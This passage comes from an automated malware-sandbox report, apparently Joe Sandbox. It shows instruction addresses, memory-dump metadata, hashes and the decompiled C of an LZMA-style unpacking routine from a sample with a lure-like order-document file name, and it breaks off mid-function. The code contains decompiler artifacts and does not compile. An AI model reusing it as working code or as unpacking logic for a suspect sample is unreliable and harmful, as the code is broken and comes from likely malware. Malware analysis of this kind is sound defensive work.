0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067be
0x004067c2
0x00406f2f
0x00000000
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e6
0x004067e9
0x0040689c
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068bf
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068ef
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x00406877
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690a
0x0040690e
0x00406f53
0x00000000
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x00000000
0x00406ad3
0x004067fb
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406826
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406862
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x0040686c
0x004067f5
0x004067e9
0x00000000
0x00000000
0x004065b8
0x00406fc0
0x00406fc0
0x00406fc0
0x00406fc3
0x00406fc7

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
Instruction ID: 6c4a77322bd37e7d8c46b95768b691bf5348243e95b36c4706824fec2f4d082d
Opcode Fuzzy Hash: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
Instruction Fuzzy Hash: A0911170D00229CBDF28CF98C8587ADBBB1FF44305F15856AE816BB281C7795A96DF84

Uniqueness

Uniqueness Score: -1.00%

Function 00406A71 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A71(void* __ebx) {
				void* _t453;
				signed int _t454;
				void* _t532;

				L0:
				while(1) {
					L0:
					if( *(_t532 - 0x40) != 0) {
						L87:
						 *((intOrPtr*)(_t532 - 0x80)) = 0x15;
						 *(_t532 - 0x58) =  *(_t532 - 4) + 0xa68;
						goto L68;
					} else {
						if( *(__ebp - 0x60) == 0) {
							L139:
							_t454 = _t453 | 0xffffffff;
						} else {
							__eax = 0;
							0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000 = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
							 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
							if( *(__ebp - 0x64) == 0) {
								 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
								goto L138;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t274 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t274;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								_t283 = __ebp - 0x64;
								 *_t283 =  *(__ebp - 0x64) - 1;
								 *( *(__ebp - 0x68)) = __cl;
								L77:
								 *(__ebp - 0x14) = __edx;
								L78:
								 *((intOrPtr*)(__ebp - 0x88)) = 2;
								L1:
								_t453 =  *(_t532 - 0x88);
								if(_t453 > 0x1c) {
									goto L139;
								} else {
									switch( *((intOrPtr*)(_t453 * 4 +  &M00406FC8))) {
										case 0:
											if( *(_t532 - 0x6c) == 0) {
												goto L138;
											} else {
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
												_t453 =  *( *(_t532 - 0x70));
												if(_t453 > 0xe1) {
													goto L139;
												} else {
													_t457 = _t453 & 0x000000ff;
													_push(0x2d);
													asm("cdq");
													_pop(_t489);
													_push(9);
													_pop(_t490);
													_t528 = _t457 / _t489;
													_t459 = _t457 % _t489 & 0x000000ff;
													asm("cdq");
													_t523 = _t459 % _t490 & 0x000000ff;
													 *(_t532 - 0x3c) = _t523;
													 *(_t532 - 0x1c) = (1 << _t528) - 1;
													 *((intOrPtr*)(_t532 - 0x18)) = (1 << _t459 / _t490) - 1;
													_t531 = (0x300 << _t523 + _t528) + 0x736;
													if(0x600 ==  *((intOrPtr*)(_t532 - 0x78))) {
														L10:
														if(_t531 != 0) {
															do {
																_t531 = _t531 - 1;
																 *((short*)( *(_t532 - 4) + _t531 * 2)) = 0x400;
															} while (_t531 != 0);
														}
														 *(_t532 - 0x48) =  *(_t532 - 0x48) & 0x00000000;
														 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
														goto L15;
													} else {
														if( *(_t532 - 4) != 0) {
															GlobalFree( *(_t532 - 4));
														}
														_t453 = GlobalAlloc(0x40, 0x600); // executed
														 *(_t532 - 4) = _t453;
														if(_t453 == 0) {
															goto L139;
														} else {
															 *((intOrPtr*)(_t532 - 0x78)) = 0x600;
															goto L10;
														}
													}
												}
											}
											goto L140;
										case 1:
											L13:
											__eflags =  *(_t532 - 0x6c);
											if( *(_t532 - 0x6c) == 0) {
												 *(_t532 - 0x88) = 1;
												goto L138;
											} else {
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												 *(_t532 - 0x40) =  *(_t532 - 0x40) | ( *( *(_t532 - 0x70)) & 0x000000ff) <<  *(_t532 - 0x48) << 0x00000003;
												 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
												_t45 = _t532 - 0x48;
												 *_t45 =  *(_t532 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t532 - 0x48) < 4) {
													goto L13;
												} else {
													_t465 =  *(_t532 - 0x40);
													if(_t465 ==  *(_t532 - 0x74)) {
														L20:
														 *(_t532 - 0x48) = 5;
														 *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) =  *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) & 0x00000000;
														goto L23;
													} else {
														 *(_t532 - 0x74) = _t465;
														if( *(_t532 - 8) != 0) {
															GlobalFree( *(_t532 - 8));
														}
														_t453 = GlobalAlloc(0x40,  *(_t532 - 0x40)); // executed
														 *(_t532 - 8) = _t453;
														if(_t453 == 0) {
															goto L139;
														} else {
															goto L20;
														}
													}
												}
											}
											goto L140;
										case 2:
											L24:
											_t472 =  *(_t532 - 0x60) &  *(_t532 - 0x1c);
											 *(_t532 - 0x84) = 6;
											 *(_t532 - 0x4c) = _t472;
											_t525 =  *(_t532 - 4) + (( *(_t532 - 0x38) << 4) + _t472) * 2;
											goto L117;
										case 3:
											L21:
											__eflags =  *(_t532 - 0x6c);
											if( *(_t532 - 0x6c) == 0) {
												 *(_t532 - 0x88) = 3;
												goto L138;
											} else {
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												_t67 = _t532 - 0x70;
												 *_t67 =  &(( *(_t532 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
												L23:
												 *(_t532 - 0x48) =  *(_t532 - 0x48) - 1;
												if( *(_t532 - 0x48) != 0) {
													goto L21;
												} else {
													goto L24;
												}
											}
											goto L140;
										case 4:
											L118:
											_t450 =  *_t525;
											_t508 = _t450 & 0x0000ffff;
											_t484 = ( *(_t532 - 0x10) >> 0xb) * _t508;
											if( *(_t532 - 0xc) >= _t484) {
												 *(_t532 - 0x10) =  *(_t532 - 0x10) - _t484;
												 *(_t532 - 0xc) =  *(_t532 - 0xc) - _t484;
												 *(_t532 - 0x40) = 1;
												_t451 = _t450 - (_t450 >> 5);
												__eflags = _t451;
												 *_t525 = _t451;
											} else {
												 *(_t532 - 0x10) = _t484;
												 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
												 *_t525 = (0x800 - _t508 >> 5) + _t450;
											}
											if( *(_t532 - 0x10) >= 0x1000000) {
												goto L124;
											} else {
												goto L122;
											}
											goto L140;
										case 5:
											L122:
											if( *(_t532 - 0x6c) == 0) {
												 *(_t532 - 0x88) = 5;
												goto L138;
											} else {
												 *(_t532 - 0x10) =  *(_t532 - 0x10) << 8;
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
												 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
												L124:
												_t452 =  *(_t532 - 0x84);
												 *(_t532 - 0x88) = _t452;
												goto L1;
											}
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *((intOrPtr*)(__ebp - 0x84)) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L117;
											} else {
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													do {
														__eax =  *(__ebp - 0x58);
														__edx = __ebx + __ebx;
														__ecx =  *(__ebp - 0x10);
														__esi = __edx + __eax;
														__ecx =  *(__ebp - 0x10) >> 0xb;
														__ax =  *__esi;
														 *(__ebp - 0x54) = __esi;
														__edi = __ax & 0x0000ffff;
														__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
														__eflags =  *(__ebp - 0xc) - __ecx;
														if( *(__ebp - 0xc) >= __ecx) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
															__cx = __ax;
															_t217 = __edx + 1; // 0x1
															__ebx = _t217;
															__cx = __ax >> 5;
															__eflags = __eax;
															 *__esi = __ax;
														} else {
															 *(__ebp - 0x10) = __ecx;
															0x800 = 0x800 - __edi;
															0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
															__ebx = __ebx + __ebx;
															 *__esi = __cx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0x10) >= 0x1000000) {
															goto L59;
														} else {
															__eflags =  *(__ebp - 0x6c);
															if( *(__ebp - 0x6c) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x70);
																__eax =  *(__ebp - 0xc);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																_t203 = __ebp - 0x70;
																 *_t203 =  *(__ebp - 0x70) + 1;
																__eflags =  *_t203;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																goto L59;
															}
														}
														goto L140;
														L59:
														__eflags = __ebx - 0x100;
													} while (__ebx < 0x100);
													goto L55;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											}
											goto L140;
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *((intOrPtr*)(__ebp - 0x80)) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												L68:
												_t525 =  *(_t532 - 0x58);
												 *(_t532 - 0x84) = 0x12;
											} else {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *((intOrPtr*)(__ebp - 0x84)) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											}
											goto L117;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *((intOrPtr*)(__ebp - 0x84)) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *((intOrPtr*)(__ebp - 0x84)) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c));
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c))) * 2;
											}
											goto L117;
										case 9:
											goto L0;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *((intOrPtr*)(__ebp - 0x84)) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x28);
												goto L86;
											}
											L117:
											 *(_t532 - 0x54) = _t525;
											goto L118;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L86:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											goto L87;
										case 0xc:
											while(1) {
												L88:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													break;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t315 = __ebp - 0x70;
												 *_t315 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t315;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												while(1) {
													_t319 = __ebp - 0x48;
													 *_t319 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t319;
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														break;
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L88;
													}
													goto L140;
												}
												__eax = __eax + __ebx;
												 *(__ebp - 0x40) = 4;
												 *(__ebp - 0x2c) = __eax;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x644;
												__eflags = __eax;
												__ebx = 0;
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x44) = 0;
												 *(__ebp - 0x48) = 0;
												while(1) {
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														break;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L100:
														_t349 = __ebp - 0x48;
														 *_t349 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t349;
														continue;
													} else {
														__eflags =  *(__ebp - 0x6c);
														if( *(__ebp - 0x6c) == 0) {
															 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
															goto L138;
														} else {
															__ecx =  *(__ebp - 0x70);
															__eax =  *(__ebp - 0xc);
															 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
															__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
															 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
															 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
															_t346 = __ebp - 0x70;
															 *_t346 =  *(__ebp - 0x70) + 1;
															__eflags =  *_t346;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
															goto L100;
														}
													}
													goto L140;
												}
												_t372 = __ebp - 0x2c;
												 *_t372 =  *(__ebp - 0x2c) + __ebx;
												__eflags =  *_t372;
												_t374 = __ebp - 0x2c;
												 *_t374 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t374;
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L138;
												} else {
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L139;
													} else {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
														__eax =  *(__ebp - 0x30);
														_t381 = __ebp - 0x60;
														 *_t381 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
														__eflags =  *_t381;
														while(1) {
															__eflags =  *(__ebp - 0x64);
															if( *(__ebp - 0x64) == 0) {
																break;
															}
															__eax =  *(__ebp - 0x14);
															__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
															__eflags = __eax -  *(__ebp - 0x74);
															if(__eax >=  *(__ebp - 0x74)) {
																__eax = __eax +  *(__ebp - 0x74);
																__eflags = __eax;
															}
															__edx =  *(__ebp - 8);
															__cl =  *(__eax + __edx);
															__eax =  *(__ebp - 0x14);
															 *(__ebp - 0x5c) = __cl;
															 *(__eax + __edx) = __cl;
															__eax = __eax + 1;
															__edx = 0;
															_t395 = __eax %  *(__ebp - 0x74);
															__eax = __eax /  *(__ebp - 0x74);
															__edx = _t395;
															__eax =  *(__ebp - 0x68);
															 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
															 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
															 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
															__eflags =  *(__ebp - 0x30);
															 *( *(__ebp - 0x68)) = __cl;
															 *(__ebp - 0x14) = _t395;
															if( *(__ebp - 0x30) > 0) {
																continue;
															} else {
																goto L78;
															}
															goto L140;
														}
														 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
														goto L138;
													}
												}
												goto L140;
											}
											 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
											goto L138;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
												goto L138;
											} else {
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													while(1) {
														__eflags = __ebx - 0x100;
														if(__ebx >= 0x100) {
															goto L54;
														}
														__eax =  *(__ebp - 0x58);
														__edx = __ebx + __ebx;
														__ecx =  *(__ebp - 0x10);
														__esi = __edx + __eax;
														__ecx =  *(__ebp - 0x10) >> 0xb;
														__ax =  *__esi;
														 *(__ebp - 0x54) = __esi;
														__edi = __ax & 0x0000ffff;
														__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
														__eflags =  *(__ebp - 0xc) - __ecx;
														if( *(__ebp - 0xc) >= __ecx) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
															__cx = __ax;
															_t170 = __edx + 1; // 0x1
															__ebx = _t170;
															__cx = __ax >> 5;
															__eflags = __eax;
															 *__esi = __ax;
														} else {
															 *(__ebp - 0x10) = __ecx;
															0x800 = 0x800 - __edi;
															0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
															__ebx = __ebx + __ebx;
															 *__esi = __cx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														 *(__ebp - 0x44) = __ebx;
